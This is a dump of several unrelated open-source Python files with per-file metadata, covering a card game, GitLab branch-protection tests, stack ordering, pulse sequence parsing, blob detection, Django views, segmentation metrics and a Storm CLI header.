avg_line_length: 37.641509 | max_line_length: 128 | alphanum_fraction: 0.700752
qsc_*_quality_signal values (schema order): 264 | 1,995 | 5.07197 | 0.465909 | 0.047797 | 0.035848 | 0.04705 | 0.093353 | 0.074683 | 0.074683 | 0.074683 | 0.074683 | 0.074683 | 0 | 0.01036 | 0.177444 | 1,995 | 52 | 129 | 38.365385 | 0.805606 | 0.144361 | 0 | 0 | 0 | 0.027778 | 0.160389 | 0.103281 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.277778 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1ccaa26614fd533c6b9140b49b0a5e2c602d313 | size: 3,343 | ext: py | lang: Python

max_stars: onirim/card/_location.py in cwahbong/onirim-py @ d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count/events null
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
"""Location cards."""
import logging
from onirim.card._base import ColorCard
from onirim import exception
from onirim import util
LOGGER = logging.getLogger(__name__)
class LocationKind(util.AutoNumberEnum):
"""
Enumerated kinds of locations.
Attributes:
sun
moon
key
"""
sun = ()
moon = ()
key = ()
def _can_obtain_door(content):
"""
Check if the explored cards can obtain a door.
"""
last_card = content.explored[-1]
same_count = 0
for card in reversed(content.explored):
if last_card.color == card.color:
same_count += 1
else:
break
return same_count % 3 == 0
class _Location(ColorCard):
"""Location card without special effect."""
def __init__(self, color, kind=None):
super().__init__(color)
if kind is not None:
self._kind = kind
def _class_name(self):
return "{} location".format(self._kind.name)
def _do_drawn(self, core):
core.content.hand.append(self)
def _do_play(self, core):
observer = core.observer
content = core.content
if content.explored and content.explored[-1].kind == self.kind:
raise exception.ConsecutiveSameKind
content.explored.append(self)
content.hand.remove(self)
if _can_obtain_door(content):
observer.on_door_obtained_by_explore(core.content)
color = content.explored[-1].color
card = content.piles.pull_door(color)
if card is not None:
content.opened.append(card)
if len(content.opened) == 8:
raise exception.Win
def _on_discard(self, core):
"""
Do additional operations after discarding a card from the hand to the
discard pile.
"""
pass
def _do_discard(self, core):
content = core.content
content.hand.remove(self)
content.piles.put_discard(self)
self._on_discard(core)
def sun(color):
"""
Make a sun location card with a specific color.
Args:
color (Color): The specific color.
Returns:
Card: A sun location card.
"""
return _Location(color, LocationKind.sun)
def moon(color):
"""
Make a moon location card with a specific color.
Args:
color (Color): The specific color.
Returns:
Card: A moon location card.
"""
return _Location(color, LocationKind.moon)
class _KeyLocation(_Location):
"""
Key location card implementation.
"""
_kind = LocationKind.key
def _on_discard(self, core):
actor = core.actor
content = core.content
drawn = content.piles.draw(5)
discarded_idx, back_idxes = actor.key_discard_react(core.content, drawn)
LOGGER.info(
"Agent choose key discard react %s, %s",
discarded_idx,
back_idxes)
# TODO check returned value
content.piles.put_discard(drawn[discarded_idx])
content.piles.put_undrawn_iter(drawn[idx] for idx in back_idxes)
def key(color):
"""
Make a key location card with a specific color.
Args:
color (Color): The specific color.
Returns:
Card: A key location card.
"""
return _KeyLocation(color)
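# A minimal usage sketch (Color.red is hypothetical; the actual Color enum
# lives elsewhere in the onirim package):
#
#     card = sun(Color.red)      # a red "sun location" card
#     key_card = key(Color.red)  # its discard triggers the draw-5 reaction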
| 23.055172
| 80
| 0.606342
| 393
| 3,343
| 4.994911
| 0.284987
| 0.048905
| 0.024452
| 0.036679
| 0.172695
| 0.152318
| 0.108507
| 0.108507
| 0.108507
| 0.108507
| 0
| 0.003845
| 0.299731
| 3,343
| 144
| 81
| 23.215278
| 0.834686
| 0.211188
| 0
| 0.102941
| 0
| 0
| 0.019664
| 0
| 0
| 0
| 0
| 0.006944
| 0
| 1
| 0.161765
| false
| 0.014706
| 0.058824
| 0.014706
| 0.397059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ccfab0d2faebbdb592b40f848ee1bf3127a09c
| 4,247
|
py
|
Python
|
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
| 31.227941
| 117
| 0.721215
| 527
| 4,247
| 5.354839
| 0.119545
| 0.101347
| 0.090716
| 0.094259
| 0.788094
| 0.681786
| 0.614812
| 0.594259
| 0.594259
| 0.487597
| 0
| 0.001192
| 0.210031
| 4,247
| 135
| 118
| 31.459259
| 0.83994
| 0.01554
| 0
| 0.647619
| 0
| 0
| 0.384965
| 0.176442
| 0
| 0
| 0
| 0
| 0.133333
| 1
| 0.047619
| false
| 0
| 0.028571
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1cdf2cb5f5f7dc477b7b2cf95774b2b25e88788
| 2,543
|
py
|
Python
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 5
|
2017-04-05T00:46:41.000Z
|
2017-11-09T01:21:44.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 69
|
2016-10-11T04:40:09.000Z
|
2022-01-12T23:57:27.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 7
|
2016-10-11T04:32:21.000Z
|
2017-12-18T05:59:17.000Z
|
from bespin.errors import StackDepCycle
class Layers(object):
"""
Used to order the creation of many stacks.
Usage::
layers = Layers({"stack1": stack1, "stack2": stack2, "stack3": stack3, "stack4": stack4})
layers.add_to_layers("stack3")
for layer in layers.layered:
# might get something like
# [("stack3", stack4), ("stack2", stack2)]
# [("stack3", stack3)]
When we create the layers, it will do a depth-first addition of all dependencies
and only add a stack to a layer that occurs after all of its dependencies.
Cyclic dependencies will be complained about.
"""
def __init__(self, stacks, all_stacks=None):
self.stacks = stacks
self.all_stacks = all_stacks
if self.all_stacks is None:
self.all_stacks = stacks
self.accounted = {}
self._layered = []
def reset(self):
"""Make a clean slate (initialize layered and accounted on the instance)"""
self.accounted = {}
self._layered = []
@property
def layered(self):
"""Yield list of [[(name, stack), ...], [(name, stack), ...], ...]"""
result = []
for layer in self._layered:
nxt = []
for name in layer:
nxt.append((name, self.all_stacks[name]))
result.append(nxt)
return result
def add_all_to_layers(self):
"""Add all the stacks to layered"""
for stack in sorted(self.stacks):
self.add_to_layers(stack)
def add_to_layers(self, name, chain=None):
layered = self._layered
if name not in self.accounted:
self.accounted[name] = True
else:
return
if chain is None:
chain = []
chain = chain + [name]
for dependency in sorted(self.all_stacks[name].dependencies(self.all_stacks)):
dep_chain = list(chain)
if dependency in chain:
dep_chain.append(dependency)
raise StackDepCycle(chain=dep_chain)
self.add_to_layers(dependency, dep_chain)
layer = 0
for dependency in self.all_stacks[name].dependencies(self.all_stacks):
for index, deps in enumerate(layered):
if dependency in deps:
if layer <= index:
layer = index + 1
continue
if len(layered) == layer:
layered.append([])
layered[layer].append(name)
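# A quick illustrative sketch (names are made up): if "app" depends on "db"
# and "db" has no dependencies, add_all_to_layers() yields the layering
# [[("db", db)], [("app", app)]] -- every stack lands in a layer strictly
# after all of its dependencies.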
| 31.012195
| 98
| 0.563508
| 294
| 2,543
| 4.761905
| 0.306122
| 0.064286
| 0.074286
| 0.036429
| 0.06
| 0.06
| 0.06
| 0.06
| 0
| 0
| 0
| 0.01003
| 0.333464
| 2,543
| 81
| 99
| 31.395062
| 0.815929
| 0.274479
| 0
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102041
| false
| 0
| 0.020408
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ce356bd1c13f7cdfe09167b87b3a43fdb85c66
| 6,851
|
py
|
Python
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | 3
|
2019-02-23T23:15:48.000Z
|
2020-03-23T12:33:15.000Z
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""events.py
Pulse sequence events for the Arduino Due pulsebox.
Radim Hošák <hosak(at)optics.upol.cz>
2021 Quantum Optics Lab Olomouc
"""
from functools import reduce
from pulsebox.codeblocks import state_change, loop, channel_states_to_odsr
from pulsebox.config import calibration, pulsebox_pincount
class DelayEvent():
def __init__(self, time_string=None, iters=None,
duration=None, loop_suffix="0"):
if time_string:
duration = read_time(time_string)
iters = time2iters(duration)
elif duration:
iters = time2iters(duration)
elif iters:
duration = calibration * iters
codeblock = loop(iters, loop_suffix)
self.duration = duration
self.iters = iters
self.loop_suffix = loop_suffix
self.codeblock = codeblock
@classmethod
def from_time_string(cls, time_string):
return cls(time_string=time_string)
def __repr__(self):
return f"Delay: {self.duration} s " \
f"({self.iters} iters)"
class StateChangeEvent():
def __init__(self, channel_states):
odsr = channel_states_to_odsr(channel_states)
codeblock = state_change(odsr_value=odsr)
self.channel_states = channel_states
self.odsr = odsr
self.codeblock = codeblock
def __repr__(self):
# msg = "Pulsebox state change: \n"
msg = "State change: "
for channel, state in enumerate(self.channel_states):
msg += f"{state}"
if channel % 4 == 3 and (channel + 1) < pulsebox_pincount:
msg += "."
# msg += f"\tCH{channel}: {state}"
msg += f" ({self.odsr})"
return msg
class PulseEvent():
def __init__(self, channel, timestamp, duration):
self.channel = channel
self.timestamp = timestamp
self.duration = duration
self.flips = [FlipEvent(channel, timestamp=timestamp),
FlipEvent(channel, timestamp=(timestamp+duration))]
def __repr__(self):
return f"Pulse on channel {self.channel} - " \
f"start: {self.timestamp} s, duration: {self.duration} s"
class FlipEvent():
"""The fundamental channel flip event.
User pulse sequence input is transformed into a sequence
of pulsebox channel flips.
"""
def __init__(self, channel, time_string=None, timestamp=None):
if not timestamp:
if not time_string:
raise ValueError("Neither time string nor timestamp given.")
timestamp = read_time(time_string)
self.channel = channel
self.timestamp = timestamp
def __repr__(self):
return f"Channel {self.channel} flip at {self.timestamp} s"
def read_time(time_string):
"""Calculate time from a string containing a number and a time unit.
The unit is denoted by the last character of `time_string`. Time is
calculated by multiplying the 'number part' of `time_string` by a factor
corresponding to the unit.
The following units are accepted:
* n: nanoseconds (factor = 1e-9)
* u: microseconds (1e-6)
* m: milliseconds (1e-3)
* s: seconds (1)
* TODO: c: MCU clock cycles (12e-9)
* TODO: i: delay loop iterations (see `calibration` in config.ini)
Args:
* time_string (str): The (number + unit) string, for example "1m"
Returns:
* float time: Time (in seconds).
"""
factors = {
"n": 1e-9,
"u": 1e-6,
"m": 1e-3,
"s": 1
}
# Check that the time string is properly formatted, i.e. a time part
# followed by the unit part. The string should contain at least two
# characters, otherwise splitting it into two parts will raise an IndexError.
try:
number, unit = time_string[:-1], time_string[-1]
except (IndexError, TypeError):
raise ValueError("Invalid time string given.")
# If the 'time part' cannot be converted to float, this raises a ValueError.
number = float(number)
if number < 0:
raise ValueError("Negative time values are not allowed.")
# Check that a valid time unit was specified. If no unit was specified,
# then what we call 'unit' will in fact be the last digit of the time value
# and as we do not use numeric unit symbols, we still get an error.
try:
factor = factors[unit]
except KeyError:
raise ValueError("Invalid time unit given.")
time = number * factor
return time
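# A few worked examples of the factor table above:
#   read_time("1m")   -> 1e-3
#   read_time("250u") -> 2.5e-4
#   read_time("2s")   -> 2.0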
def time2iters(time):
"""Get the number of loop iterations required to achieve a given time delay.
Args:
* time (float): The time to convert to the number of delay loop iters.
Returns:
* int iters: The number of iterations through the ASM delay loop
required to produce a delay of a given length.
Notes:
The possible delay times are discrete, with a step given by the
structure of the ASM loop. This step is given by the `calibration`
variable in the config.
For example, if our delays for 1, 2, and 3 delay loop iterations are
50 ns, 100 ns, and 150 ns, respectively, and we want to convert
120 ns to delay loop iterations, we would see that 2.4 iterations are
required. As this is impossible, we round this to the nearest integer
amount of iterations. In this case, that's 2 iterations and instead of
120 ns delay we produced a 100 ns delay.
"""
if time < 0:
raise ValueError("Negative time is not allowed.")
iters = int(round(time / calibration))
return iters
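# Worked example matching the docstring: assuming calibration = 50e-9
# (the real value comes from config.ini), time2iters(120e-9) rounds
# 2.4 iterations to 2, i.e. a 100 ns delay instead of 120 ns.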
def parse_events(event_string, channel=None):
"""Convert a long string of events into an array of event instances.
"""
event_substrings = event_string.split(" ")
events = []
for substring in event_substrings:
try:
event_type, event_params = substring[0], substring[1:]
except (IndexError, ValueError):
print(f"CH {channel} - Invalid event string: " \
f"{event_string.__repr__()}")
return events
if event_type.lower() == "p": # PulseEvent
# Pulse event contains two timestrings - start and duration.
# Separate them.
timestamp, duration = None, None
for n, ch in enumerate(event_params):
if ch.isalpha():
timestamp = read_time(event_params[:n+1])
duration = read_time(event_params[n+1:])
break
pe = PulseEvent(channel, timestamp, duration)
new_events = pe.flips
for event in new_events:
events.append(event)
return events
| 34.084577
| 80
| 0.618888
| 866
| 6,851
| 4.786374
| 0.284065
| 0.041013
| 0.010615
| 0.01737
| 0.072376
| 0.041978
| 0
| 0
| 0
| 0
| 0
| 0.01285
| 0.295723
| 6,851
| 200
| 81
| 34.255
| 0.846218
| 0.3671
| 0
| 0.198113
| 0
| 0
| 0.107186
| 0.006049
| 0
| 0
| 0
| 0.01
| 0
| 1
| 0.113208
| false
| 0
| 0.028302
| 0.028302
| 0.254717
| 0.009434
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d2400def017bc7e08b7a2881ecb907828aa29c
| 1,839
|
py
|
Python
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 12
|
2018-05-14T17:43:18.000Z
|
2021-11-16T04:03:33.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 34
|
2019-05-06T19:13:36.000Z
|
2021-05-06T19:12:35.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 3
|
2019-10-08T17:42:17.000Z
|
2021-07-28T05:52:02.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from skimage.measure import label, regionprops
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Blob Detect Tool")
parser.set_defaults(func=lambda _: parser.print_help())
parser.add_argument("-i", "--input", required=True, help="Input numpy array file")
parser.add_argument(
"--min", required=True, help="minimum area for region to be counted"
)
parser.add_argument(
"--max", required=True, help="maximum area for region to be counted"
)
parser.add_argument("-o", "--outfile", required=True, help="Output file")
return parser
def blob_detect(dense_map, min, max):
labels = label(dense_map)
regions = regionprops(labels)
output = np.empty((0, dense_map.ndim))
for props in regions:
if props.area >= float(min) and props.area <= float(max):
output = np.concatenate((output, [props.centroid]), axis=0)
return output
def main():
parser = get_parser()
args = parser.parse_args()
input_array = np.load(args.input)
output_array = blob_detect(input_array, min=args.min, max=args.max)
np.save(args.outfile, output_array)
if __name__ == "__main__":
main()
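# Example invocation (paths are illustrative):
#   python blob_detect.py -i dense_map.npy --min 10 --max 500 -o centroids.npy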
| 34.055556
| 86
| 0.707993
| 259
| 1,839
| 4.92278
| 0.486486
| 0.047059
| 0.053333
| 0.025098
| 0.064314
| 0.064314
| 0.064314
| 0.064314
| 0.064314
| 0
| 0
| 0.006676
| 0.185427
| 1,839
| 53
| 87
| 34.698113
| 0.844459
| 0.32137
| 0
| 0.064516
| 0
| 0
| 0.13047
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.096774
| 0
| 0.258065
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d3dc26cb6e1253349d57f3b6bf5b06931d5da6
| 774
|
py
|
Python
|
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from .models import User
from . import forms
# Create your views here.
def index(request):
context = {
'django':'The Web Framework for Developers with a deadline'
}
return render(request,'index.html', context=context)
def signup(request):
sign_up = forms.UserForm()
if request.method == "POST":
sign_up = forms.UserForm(request.POST)
if sign_up.is_valid():
sign_up.save(commit=True)
return index(request)
data = {
'form':sign_up,
}
return render(request,'signup.html',context=data)
def userlist(request):
users = User.objects.order_by('name')
data = {
'users':users,
}
return render(request,'userlist.html',context = data)
| 26.689655
| 67
| 0.639535
| 96
| 774
| 5.083333
| 0.479167
| 0.061475
| 0.116803
| 0.077869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241602
| 774
| 29
| 68
| 26.689655
| 0.831346
| 0.029716
| 0
| 0.08
| 0
| 0
| 0.14
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.12
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1d9fe63dcda29a6aafbbbb348278fbcaa1eb8c3
| 3,449
|
py
|
Python
|
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
import os
import argparse
import logging
import numpy as np
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO)
from tqdm import tqdm
import cv2
import sys
from PIL import Image
from sklearn import metrics
def Accuracy(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
accuracy = (TP + TN)/float(TP + TN + FP + FN)
return accuracy
def Dice(y_true, y_pred):
"""Returns Dice Similarity Coefficient for ground truth and predicted masks."""
#print(y_true.dtype)
#print(y_pred.dtype)
y_true = np.squeeze(y_true)/255
y_pred = np.squeeze(y_pred)/255
y_true = y_true.astype('bool')
y_pred = y_pred.astype('bool')
intersection = np.logical_and(y_true, y_pred).sum()
return ((2. * intersection.sum()) + 1.) / (y_true.sum() + y_pred.sum() + 1.)
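# Sanity check on a toy all-foreground mask (values 0/255 as assumed here):
#   a = np.full((4, 4), 255); Dice(a, a) == (2*16 + 1) / (16 + 16 + 1) == 1.0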
def IoU(Gi,Si):
#print(Gi.shape, Si.shape)
Gi = np.squeeze(Gi)/255
Si = np.squeeze(Si)/255
Gi = Gi.astype('bool')
Si = Si.astype('bool')
intersect = 1.0*np.sum(np.logical_and(Gi,Si))
union = 1.0*np.sum(np.logical_or(Gi,Si))
return intersect/union
def Sensitivity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
sensitivity = TP/float(TP + FN)
return sensitivity
def Specificity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
specificity = TN/float(TN+FP)
return specificity
def main():
parser = argparse.ArgumentParser(description='ELM line segmentation')
parser.add_argument('--label_dir', type=str, default='/home/vivek/Music/demo/stack/seg',
help='folder of test label')
parser.add_argument('--pred_dir', type=str, default='/home/vivek/Music/demo/stack/pred',
help='folder of pred masks')
args = parser.parse_args()
labels = [os.path.join(args.label_dir, x) for x in os.listdir(os.path.join(args.label_dir)) if 'raw' not in x]
preds = [os.path.join(args.pred_dir, x) for x in os.listdir(os.path.join(args.pred_dir)) if 'raw' not in x]
mean_dice = []
mean_iou = []
mean_sensitivity = []
mean_specificity = []
mean_accuracy = []
for l, p in zip(labels, preds):
logging.info("Process %s and %s" % (p, l))
G = sitk.GetArrayFromImage(sitk.ReadImage(l))
S = sitk.GetArrayFromImage(sitk.ReadImage(p))
mean_accuracy.append(Accuracy(G, S))
mean_dice.append(Dice(G, S))
mean_iou.append(IoU(G, S))
mean_sensitivity.append(Sensitivity(G, S))
mean_specificity.append(Specificity(G, S))
print ('Mean_Accuracy = ', np.mean(np.array(mean_accuracy)))
print ('Mean_Dice = ', np.mean(np.array(mean_dice)))
print ('Mean_IoU = ', np.mean(np.array(mean_iou)))
print ('Mean_Sensitivity = ', np.mean(np.array(mean_sensitivity)))
print ('Mean_Specificity = ', np.mean(np.array(mean_specificity)))
if __name__ == '__main__':
main()
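# Example invocation (folders are illustrative; the defaults above point at
# the author's local paths):
#   python metrics.py --label_dir ./labels --pred_dir ./preds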
| 35.556701
| 114
| 0.643665
| 551
| 3,449
| 3.854809
| 0.199637
| 0.051789
| 0.046139
| 0.092279
| 0.366761
| 0.319209
| 0.269303
| 0.269303
| 0.269303
| 0.231638
| 0
| 0.02462
| 0.199188
| 3,449
| 96
| 115
| 35.927083
| 0.744388
| 0.039722
| 0
| 0.155844
| 0
| 0
| 0.082022
| 0.019673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077922
| false
| 0
| 0.12987
| 0
| 0.272727
| 0.064935
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dc37b00019bdcd4fd7800d93e149be0dfe2bdf
| 11,747
|
py
|
Python
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 216
|
2017-01-17T18:52:50.000Z
|
2022-03-31T18:44:49.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 2,189
|
2017-01-17T22:31:48.000Z
|
2022-03-31T20:41:45.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 44
|
2017-01-17T16:50:57.000Z
|
2022-03-16T18:35:52.000Z
|
import os
import sys
import copy
import asyncio
import logging
import argparse
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.telepath as s_telepath
import synapse.lib.cli as s_cli
import synapse.lib.cmd as s_cmd
import synapse.lib.node as s_node
import synapse.lib.time as s_time
import synapse.lib.output as s_output
import synapse.lib.parser as s_parser
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
ERROR_COLOR = '#ff0066'
WARNING_COLOR = '#f4e842'
NODEEDIT_COLOR = "lightblue"
welcome = '''
Welcome to the Storm interpreter!
Local interpreter (non-storm) commands may be executed with a ! prefix:
Use !quit to exit.
Use !help to see local interpreter commands.
'''
class QuitCmd(s_cli.CmdQuit):
'''
Quit the current command line interpreter.
Example:
!quit
'''
_cmd_name = '!quit'
